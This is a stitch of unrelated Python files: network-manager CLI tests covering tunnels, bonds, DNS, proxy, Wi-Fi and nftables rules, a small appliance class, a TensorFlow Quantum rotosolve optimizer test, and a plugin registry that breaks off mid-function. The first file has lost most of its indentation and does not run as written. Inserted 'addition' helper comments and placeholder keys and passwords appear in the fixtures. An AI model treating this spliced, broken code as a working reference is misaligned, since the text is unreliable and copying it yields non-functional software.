vrf_parser.read(os.path.join(networkd_unit_file_path, '10-veth-98.netdev'))
assert(vrf_parser.get('NetDev', 'Name') == 'veth-98')
assert(vrf_parser.get('NetDev', 'kind') == 'veth')
assert(vrf_parser.get('Peer', 'Name') == 'veth-99')
vrf_network_parser = configparser.ConfigParser()
vrf_network_parser.read(os.path.join(networkd_unit_file_path, '10-veth-98.network'))
assert(vrf_network_parser.get('Match', 'Name') == 'veth-98')
link_remove('veth-98')
def test_cli_create_ipip(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-ipip', 'ipip-98', 'dev', 'test98', 'local', '192.168.1.2', 'remote', '192.168.1.3'])
assert(unit_exits('10-ipip-98.netdev') == True)
assert(unit_exits('10-ipip-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('ipip-98') == True)
ipip_parser = configparser.ConfigParser()
ipip_parser.read(os.path.join(networkd_unit_file_path, '10-ipip-98.netdev'))
assert(ipip_parser.get('NetDev', 'Name') == 'ipip-98')
assert(ipip_parser.get('NetDev', 'kind') == 'ipip')
assert(ipip_parser.get('Tunnel', 'Local') == '192.168.1.2')
assert(ipip_parser.get('Tunnel', 'Remote') == '192.168.1.3')
ipip_network_parser = configparser.ConfigParser()
ipip_network_parser.read(os.path.join(networkd_unit_file_path, '10-ipip-98.network'))
assert(ipip_network_parser.get('Match', 'Name') == 'ipip-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'Tunnel') == 'ipip-98')
link_remove('ipip-98')
def test_cli_create_gre(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-gre', 'gre-98', 'dev', 'test98', 'local', '192.168.1.2', 'remote', '192.168.1.3'])
assert(unit_exits('10-gre-98.netdev') == True)
assert(unit_exits('10-gre-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('gre-98') == True)
gre_parser = configparser.ConfigParser()
gre_parser.read(os.path.join(networkd_unit_file_path, '10-gre-98.netdev'))
assert(gre_parser.get('NetDev', 'Name') == 'gre-98')
assert(gre_parser.get('NetDev', 'kind') == 'gre')
assert(gre_parser.get('Tunnel', 'Local') == '192.168.1.2')
assert(gre_parser.get('Tunnel', 'Remote') == '192.168.1.3')
gre_network_parser = configparser.ConfigParser()
gre_network_parser.read(os.path.join(networkd_unit_file_path, '10-gre-98.network'))
assert(gre_network_parser.get('Match', 'Name') == 'gre-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'Tunnel') == 'gre-98')
link_remove('gre-98')
def test_cli_create_vti(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-vti', 'vti-98', 'dev', 'test98', 'local', '192.168.1.2', 'remote', '192.168.1.3'])
assert(unit_exits('10-vti-98.netdev') == True)
assert(unit_exits('10-vti-98.network') == True)
assert(unit_exits('10-test98.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '3'])
assert(link_exits('vti-98') == True)
vti_parser = configparser.ConfigParser()
vti_parser.read(os.path.join(networkd_unit_file_path, '10-vti-98.netdev'))
assert(vti_parser.get('NetDev', 'Name') == 'vti-98')
assert(vti_parser.get('NetDev', 'kind') == 'vti')
assert(vti_parser.get('Tunnel', 'Local') == '192.168.1.2')
assert(vti_parser.get('Tunnel', 'Remote') == '192.168.1.3')
vti_network_parser = configparser.ConfigParser()
vti_network_parser.read(os.path.join(networkd_unit_file_path, '10-vti-98.network'))
assert(vti_network_parser.get('Match', 'Name') == 'vti-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'Tunnel') == 'vti-98')
link_remove('vti-98')
@pytest.mark.skip(reason="skipping")
def test_cli_create_wireguard(self):
subprocess.check_call(['nmctl', 'create-wg', 'wg99', 'private-key', 'EEGlnEPYJV//kbvvIqxKkQwOiS+UENyPncC4bF46ong=', 'listen-port', '32', 'public-key', 'RDf+LSpeEre7YEIKaxg+wbpsNV7du+ktR99uBEtIiCA', 'endpoint', '192.168.3.56:2000', 'allowed-ips', '192.168.1.2'])
assert(unit_exits('10-wg99.netdev') == True)
assert(unit_exits('10-wg99.network') == True)
restart_networkd()
subprocess.check_call(['sleep', '15'])
assert(link_exits('wg99') == True)
wg_parser = configparser.ConfigParser()
wg_parser.read(os.path.join(networkd_unit_file_path, '10-wg99.netdev'))
assert(wg_parser.get('NetDev', 'Name') == 'wg99')
assert(wg_parser.get('NetDev', 'kind') == 'wireguard')
assert(wg_parser.get('WireGuard', 'PrivateKey') == 'EEGlnEPYJV//kbvvIqxKkQwOiS+UENyPncC4bF46ong=')
assert(wg_parser.get('WireGuard', 'ListenPort') == '32')
assert(wg_parser.get('WireGuardPeer', 'PublicKey') == 'RDf+LSpeEre7YEIKaxg+wbpsNV7du+ktR99uBEtIiCA')
assert(wg_parser.get('WireGuardPeer', 'Endpoint') == '192.168.3.56:2000')
assert(wg_parser.get('WireGuardPeer', 'AllowedIPs') == '192.168.1.2')
network_parser = configparser.ConfigParser()
network_parser.read(os.path.join(networkd_unit_file_path, '10-wg99.network'))
assert(network_parser.get('Match', 'Name') == 'wg99')
link_remove('wg99')
def test_cli_create_vxlan(self):
assert(link_exits('test98') == True)
subprocess.check_call(['nmctl', 'create-vxlan', 'vxlan-98', 'dev', 'test98', 'vni', '32', 'local', '192.168.1.2', 'remote', '192.168.1.3', 'port', '7777'])
assert(unit_exits('10-test98.network') == True)
assert(unit_exits('10-vxlan-98.network') == True)
assert(unit_exits('10-vxlan-98.netdev') == True)
restart_networkd()
subprocess.check_call(['sleep', '15'])
assert(link_exits('vxlan-98') == True)
vxlan_parser = configparser.ConfigParser()
vxlan_parser.read(os.path.join(networkd_unit_file_path, '10-vxlan-98.netdev'))
assert(vxlan_parser.get('NetDev', 'Name') == 'vxlan-98')
assert(vxlan_parser.get('NetDev', 'kind') == 'vxlan')
assert(vxlan_parser.get('VXLAN', 'VNI') == '32')
assert(vxlan_parser.get('VXLAN', 'Local') == '192.168.1.2')
assert(vxlan_parser.get('VXLAN', 'Remote') == '192.168.1.3')
assert(vxlan_parser.get('VXLAN', 'DestinationPort') == '7777')
vxlan_network_parser = configparser.ConfigParser()
vxlan_network_parser.read(os.path.join(networkd_unit_file_path, '10-vxlan-98.network'))
assert(vxlan_network_parser.get('Match', 'Name') == 'vxlan-98')
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(parser.get('Match', 'Name') == 'test98')
assert(parser.get('Network', 'VXLAN') == 'vxlan-98')
link_remove('vxlan-98')
def test_cli_create_bridge(self):
link_add_dummy('test-99')
assert(link_exits('test98') == True)
assert(link_exits('test-99') == True)
subprocess.check_call(['nmctl', 'create-bridge', 'bridge-98', 'test98', 'test-99'])
assert(unit_exits('10-test98.network') == True)
assert(unit_exits('10-test-99.network') == True)
assert(unit_exits('10-bridge-98.network') == True)
assert(unit_exits('10-bridge-98.netdev') == True)
subprocess.check_call(['sleep', '3'])
assert(link_exits('bridge-98') == True)
bridge_parser = configparser.ConfigParser()
bridge_parser.read(os.path.join(networkd_unit_file_path, '10-bridge-98.netdev'))
assert(bridge_parser.get('NetDev', 'Name') == 'bridge-98')
assert(bridge_parser.get('NetDev', 'kind') == 'bridge')
bridge_network_parser = configparser.ConfigParser()
bridge_network_parser.read(os.path.join(networkd_unit_file_path, '10-bridge-98.network'))
assert(bridge_network_parser.get('Match', 'Name') == 'bridge-98')
test98_parser = configparser.ConfigParser()
test98_parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(test98_parser.get('Match', 'Name') == 'test98')
assert(test98_parser.get('Network', 'Bridge') == 'bridge-98')
test99_parser = configparser.ConfigParser()
test99_parser.read(os.path.join(networkd_unit_file_path, '10-test-99.network'))
assert(test99_parser.get('Match', 'Name') == 'test-99')
assert(test99_parser.get('Network', 'Bridge') == 'bridge-98')
link_remove('bridge-98')
link_remove('test-99')
def test_cli_create_bond(self):
link_add_dummy('test-99')
assert(link_exits('test98') == True)
assert(link_exits('test-99') == True)
subprocess.check_call(['nmctl', 'create-bond', 'bond-98', 'mode', 'balance-rr', 'test98', 'test-99'])
assert(unit_exits('10-test98.network') == True)
assert(unit_exits('10-test-99.network') == True)
assert(unit_exits('10-bond-98.network') == True)
assert(unit_exits('10-bond-98.netdev') == True)
subprocess.check_call(['sleep', '3'])
assert(link_exits('bond-98') == True)
bond_parser = configparser.ConfigParser()
bond_parser.read(os.path.join(networkd_unit_file_path, '10-bond-98.netdev'))
assert(bond_parser.get('NetDev', 'Name') == 'bond-98')
assert(bond_parser.get('NetDev', 'kind') == 'bond')
assert(bond_parser.get('Bond', 'Mode') == 'balance-rr')
bond_network_parser = configparser.ConfigParser()
bond_network_parser.read(os.path.join(networkd_unit_file_path, '10-bond-98.network'))
assert(bond_network_parser.get('Match', 'Name') == 'bond-98')
test98_parser = configparser.ConfigParser()
test98_parser.read(os.path.join(networkd_unit_file_path, '10-test98.network'))
assert(test98_parser.get('Match', 'Name') == 'test98')
assert(test98_parser.get('Network', 'Bond') == 'bond-98')
test99_parser = configparser.ConfigParser()
test99_parser.read(os.path.join(networkd_unit_file_path, '10-test-99.network'))
assert(test99_parser.get('Match', 'Name') == 'test-99')
assert(test99_parser.get('Network', 'Bond') == 'bond-98')
link_remove('bond-98')
link_remove('test-99')
class TestCLIGlobalDNSDomain:
def test_cli_configure_global_dns_server(self):
subprocess.check_call(['nmctl', 'add-dns', 'global', '8.8.4.4', '8.8.8.8', '8.8.8.1', '8.8.8.2'])
subprocess.check_call(['sleep', '3'])
parser = configparser.ConfigParser()
parser.read('/etc/systemd/resolved.conf')
assert(parser.get('Resolve', 'DNS') == '8.8.4.4 8.8.8.1 8.8.8.2 8.8.8.8')
def test_cli_configure_global_domain_server(self):
subprocess.check_call(['nmctl', 'add-domain', 'global', 'test1', 'test2'])
subprocess.check_call(['sleep', '3'])
parser = configparser.ConfigParser()
parser.read('/etc/systemd/resolved.conf')
assert(parser.get('Resolve', 'Domains') == 'test1 test2')
class TestCLINetworkProxy:
def test_cli_configure_network_proxy(self):
if not os.path.exists("/etc/sysconfig/"):
os.mkdir("/etc/sysconfig/")
f = open("/etc/sysconfig/proxy", "w")
f.write("PROXY_ENABLED=\"no\"\nHTTP_PROXY=""\nHTTPS_PROXY=""\nNO_PROXY=\"localhost, 127.0.0.1\"\n")
f.close()
subprocess.check_call(['nmctl', 'set-proxy', 'enable', 'yes', 'http', 'http://test.com:123', 'https', 'https://test.com:123'])
dictionary = {}
file = open("/etc/sysconfig/proxy")
lines = file.read().split('\n')
for line in lines:
if line == '':
continue
pair = line.split('=')
dictionary[pair[0].strip('\'\'\"\"')] = pair[1].strip('\'\'\"\"')
assert(dictionary["HTTP_PROXY"] == "http://test.com:123")
assert(dictionary["HTTPS_PROXY"] == "https://test.com:123")
assert(dictionary["PROXY_ENABLED"] == "yes")
        subprocess.check_call(['nmctl', 'set-proxy', 'enable', 'yes', 'http', 'http://test.com:123', 'ftp', 'https://test.com:123'])
class TestWifiWPASupplicantConf:
yaml_configs = [
"name-password-wifi-dhcp.yaml",
"name-password-wifi-static.yaml",
"wpa-eap-tls-wifi.yaml",
"wpa-eap-ttls.yaml",
]
def copy_yaml_file_to_netmanager_yaml_path(self, config_file):
shutil.copy(os.path.join(network_config_manager_ci_yaml_path, config_file), network_config_manager_yaml_config_path)
def remove_units_from_netmanager_yaml_path(self):
for config_file in self.yaml_configs:
if (os.path.exists(os.path.join(network_config_manager_yaml_config_path, config_file))):
os.remove(os.path.join(network_config_manager_yaml_config_path, config_file))
def teardown_method(self):
remove_units_from_netword_unit_path()
self.remove_units_from_netmanager_yaml_path()
def test_wifi_wpa_supplicant_name_password_dhcp(self):
self.copy_yaml_file_to_netmanager_yaml_path('name-password-wifi-dhcp.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-wlan1.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-wlan1.network'))
assert(parser.get('Match', 'Name') == 'wlan1')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(wifi_wpa_supplilant_conf_exits() == True)
network = read_wpa_supplicant_conf(network_config_manager_wpa_supplilant_conf_file)
assert(network["ssid"] == "network_ssid_name1")
assert(network["password"] == "test123")
def test_wifi_wpa_supplicant_name_password_static(self):
self.copy_yaml_file_to_netmanager_yaml_path('name-password-wifi-static.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-wlan1.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-wlan1.network'))
assert(parser.get('Match', 'Name') == 'wlan1')
assert(parser.get('Route', 'Gateway') == '192.168.1.1/24')
assert(parser.get('Route', 'GatewayOnlink') == 'yes')
assert(wifi_wpa_supplilant_conf_exits() == True)
network = read_wpa_supplicant_conf(network_config_manager_wpa_supplilant_conf_file)
if network is None:
assert(False)
assert(network["ssid"] == "network_ssid_name1")
assert(network["password"] == "test123")
@pytest.mark.skip(reason="skipping")
def test_wifi_wpa_supplicant_eap_tls_dhcp(self):
self.copy_yaml_file_to_netmanager_yaml_path('wpa-eap-tls-wifi.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-wlan1.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-wlan1.network'))
assert(parser.get('Match', 'Name') == 'wlan1')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(wifi_wpa_supplilant_conf_exits() == True)
network = read_wpa_supplicant_conf(network_config_manager_wpa_supplilant_conf_file)
if network is None:
assert(False)
assert(network["ssid"] == "network_ssid_name1")
assert(network["eap"] == "PEAP")
assert(network["identity"] == "[email protected]")
assert(network["anonymous_identity"] == "@test.example.com")
assert(network["ca_cert"] == "/etc/ssl/cust-cacrt.pem")
assert(network["client_cert"] == "/etc/ssl/cust-crt.pem")
assert(network["private_key"] == "/etc/ssl/cust-key.pem")
assert(network["private_key_passwd"] == "QZTrSEtq:h_d.W7_")
def test_wifi_wpa_supplicant_eap_ttls_dhcp(self):
self.copy_yaml_file_to_netmanager_yaml_path('wpa-eap-ttls.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-wlan0.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-wlan0.network'))
assert(parser.get('Match', 'Name') == 'wlan0')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(wifi_wpa_supplilant_conf_exits() == True)
network = read_wpa_supplicant_conf(network_config_manager_wpa_supplilant_conf_file)
if network is None:
assert(False)
assert(network["ssid"] == "network_ssid_name1")
assert(network["identity"] == "[email protected]")
assert(network["anonymous_identity"] == "@test.example.com")
assert(network["password"] == "test123")
class TestNFTable(unittest.TestCase):
def tearDown(self):
subprocess.call(['nft', 'delete', 'table', 'testtable99'])
def test_nmctl_add_table(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
output = subprocess.check_output(['nft', 'list', 'tables'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'table ip testtable99')
def test_nmctl_show_table(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
output = subprocess.check_output(['nmctl', 'show-nft-tables'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
def test_nmctl_delete_table(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
output = subprocess.check_output(['nft', 'list', 'tables'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'table ip testtable99')
subprocess.check_call(['nmctl', 'delete-nft-table', 'ipv4', 'testtable99'])
output = subprocess.check_output(['nft', 'list', 'tables'], universal_newlines=True).rstrip()
print(output)
self.assertNotRegex(output, 'table ip testtable99')
def test_nmctl_add_chain(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
def test_nmctl_show_chain(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
def test_nmctl_delete_chain(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'delete-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertNotRegex(output, 'testchain99')
def test_nmctl_add_rule_tcp_accept(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'tcp', 'dport', '9999', 'accept'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'tcp dport 9999 counter packets 0 bytes 0 accept')
def test_nmctl_add_rule_tcp_drop(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'tcp', 'dport', '9999', 'drop'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'tcp dport 9999 counter packets 0 bytes 0 drop')
def test_nmctl_add_rule_tcp_drop_sport(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'tcp', 'sport', '9999', 'drop'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'tcp sport 9999 counter packets 0 bytes 0 drop')
def test_nmctl_add_rule_tcp_drop_accept_sport(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'tcp', 'sport', '9999', 'accept'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'tcp sport 9999 counter packets 0 bytes 0 accept')
def test_nmctl_add_rule_udp_accept_sport(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'udp', 'sport', '9999', 'accept'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'udp sport 9999 counter packets 0 bytes 0 accept')
def test_nmctl_add_rule_udp_drop_dport(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'udp', 'dport', '9999', 'drop'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'udp dport 9999 counter packets 0 bytes 0 drop')
def test_nmctl_add_rule_udp_accept_dport(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'udp', 'dport', '9999', 'accept'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'udp dport 9999 counter packets 0 bytes 0 accept')
def test_nmctl_delete_rule(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'udp', 'dport', '9999', 'accept'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'udp dport 9999 counter packets 0 bytes 0 accept')
subprocess.check_call(['nmctl', 'delete-nft-rule', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertNotRegex(output, 'udp dport 9999 counter packets 0 bytes 0 accept')
def setUpModule():
    if not os.path.exists(network_config_manager_yaml_config_path):
        os.makedirs(network_config_manager_yaml_config_path)
def tearDownModule():
if os.path.exists(network_config_manager_ci_path):
shutil.rmtree(network_config_manager_ci_path)
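# Hedged sketch (an addition, not part of the original suite): helpers such as
# link_exits(), unit_exits(), link_add_dummy() and restart_networkd() are assumed
# to be defined earlier in this module. For illustration only, a link-existence
# check could look like the function below; the name is prefixed so it does not
# shadow the real helper.
def _example_link_exists(link):
    """Return True if the kernel currently exposes a network link by this name."""
    return os.path.exists(os.path.join('/sys/class/net', link))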
|
python
|
from project.appliances.appliance import Appliance
class TV(Appliance):
def __init__(self):
self.cost = 1.5
super().__init__(self.cost)
|
python
|
# Copyright 2020 The TensorFlow Quantum Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test module for tfq.python.optimizers.rotosolve_minimizer optimizer."""
# Remove PYTHONPATH collisions for protobuf.
# pylint: disable=wrong-import-position
import sys
NEW_PATH = [x for x in sys.path if 'com_google_protobuf' not in x]
sys.path = NEW_PATH
# pylint: enable=wrong-import-position
from operator import mul
from functools import reduce
import numpy as np
import tensorflow as tf
from absl.testing import parameterized
import cirq
import sympy
from tensorflow_quantum.python.layers.high_level import pqc
from tensorflow_quantum.python import util
from tensorflow_quantum.python.optimizers import rotosolve_minimizer
def loss_function_with_model_parameters(model, loss, train_x, train_y):
"""Create a new function that assign the model parameter to the model
and evaluate its value.
Args:
model : an instance of `tf.keras.Model` or its subclasses.
loss : a function with signature loss_value = loss(pred_y, true_y).
train_x : the input part of training data.
train_y : the output part of training data.
Returns:
A function that has a signature of:
loss_value = f(model_parameters).
"""
# obtain the shapes of all trainable parameters in the model
shapes = tf.shape_n(model.trainable_variables)
count = 0
sizes = []
# Record the shape of each parameter
for shape in shapes:
n = reduce(mul, shape)
sizes.append(n)
count += n
    # Function that accepts the flat parameter vector and evaluates the model
@tf.function
def func(params):
"""A function that can be used by tfq.optimizer.rotosolve_minimize.
Args:
params [in]: a 1D tf.Tensor.
Returns:
Loss function value
"""
# update the parameters of the model
start = 0
for i, size in enumerate(sizes):
            model.trainable_variables[i].assign(
                tf.reshape(params[start:start + size], shapes[i]))
start += size
# evaluate the loss
loss_value = loss(model(train_x, training=True), train_y)
return loss_value
return func
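# Illustrative helper (an addition, not part of the original TFQ test file): shows
# how the closure built by loss_function_with_model_parameters() is handed to the
# rotosolve minimizer. `model`, `x` and `y` are placeholders supplied by the caller.
def _example_minimize_keras_model(model, x, y):
    """Sketch only: run rotosolve over all trainable variables of a Keras model."""
    loss_fn = loss_function_with_model_parameters(model, tf.keras.losses.Hinge(), x, y)
    # Flatten every trainable variable into one 1-D initial guess in [0, 2*pi).
    n_params = int(sum(int(tf.size(v)) for v in model.trainable_variables))
    initial = tf.random.uniform(shape=[n_params]) * 2 * np.pi
    return rotosolve_minimizer.minimize(loss_fn, initial)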
class RotosolveMinimizerTest(tf.test.TestCase, parameterized.TestCase):
"""Tests for the rotosolve optimization algorithm."""
def test_function_optimization(self):
"""Optimize a simple sinusoid function."""
n = 10 # Number of parameters to be optimized
coefficient = tf.random.uniform(shape=[n])
min_value = -tf.math.reduce_sum(tf.abs(coefficient))
func = lambda x: tf.math.reduce_sum(tf.sin(x) * coefficient)
result = rotosolve_minimizer.minimize(func, np.random.random(n))
self.assertAlmostEqual(func(result.position), min_value)
self.assertAlmostEqual(result.objective_value, min_value)
self.assertTrue(result.converged)
self.assertLess(result.num_iterations,
50) # 50 is the default max iteration
def test_nonlinear_function_optimization(self):
"""Test to optimize a non-linear function.
A non-linear function cannot be optimized by rotosolve,
therefore the optimization must never converge.
"""
func = lambda x: x[0]**2 + x[1]**2
result = rotosolve_minimizer.minimize(func,
tf.random.uniform(shape=[2]))
self.assertFalse(result.converged)
self.assertEqual(result.num_iterations,
50) # 50 is the default max iteration
def test_keras_model_optimization(self):
"""Optimizate a PQC based keras model."""
x = np.asarray([
[0, 0],
[0, 1],
[1, 0],
[1, 1],
], dtype=float)
y = np.asarray([[-1], [1], [1], [-1]], dtype=np.float32)
def convert_to_circuit(input_data):
"""Encode into quantum datapoint."""
values = np.ndarray.flatten(input_data)
qubits = cirq.GridQubit.rect(1, 2)
circuit = cirq.Circuit()
for i, value in enumerate(values):
if value:
circuit.append(cirq.X(qubits[i]))
return circuit
x_circ = util.convert_to_tensor([convert_to_circuit(x) for x in x])
# Create two qubits
q0, q1 = cirq.GridQubit.rect(1, 2)
        # Create an ansatz on these qubits.
a, b = sympy.symbols('a b') # parameters for the circuit
circuit = cirq.Circuit(
cirq.rx(a).on(q0),
cirq.ry(b).on(q1), cirq.CNOT(control=q0, target=q1))
# Build the Keras model.
model = tf.keras.Sequential([
# The input is the data-circuit, encoded as a tf.string
tf.keras.layers.Input(shape=(), dtype=tf.string),
# The PQC layer returns the expected value of the
# readout gate, range [-1,1].
pqc.PQC(circuit, cirq.Z(q1)),
])
# Initial guess of the parameter from random number
result = rotosolve_minimizer.minimize(
loss_function_with_model_parameters(model, tf.keras.losses.Hinge(),
x_circ, y),
tf.random.uniform(shape=[2]) * 2 * np.pi)
self.assertAlmostEqual(result.objective_value, 0)
self.assertTrue(result.converged)
if __name__ == "__main__":
tf.test.main()
|
python
|
from importlib import import_module
from importlib import resources
PLUGINS = dict()
def register_plugin(func):
"""Decorator to register plug-ins"""
name = func.__name__
PLUGINS[name] = func
return func
def __getattr__(name):
"""Return a named plugin"""
try:
return PLUGINS[name]
except KeyError:
_import_plugins()
if name in PLUGINS:
return PLUGINS[name]
else:
raise AttributeError(
f"module {__name__!r} has no attribute {name!r}"
) from None
def __dir__():
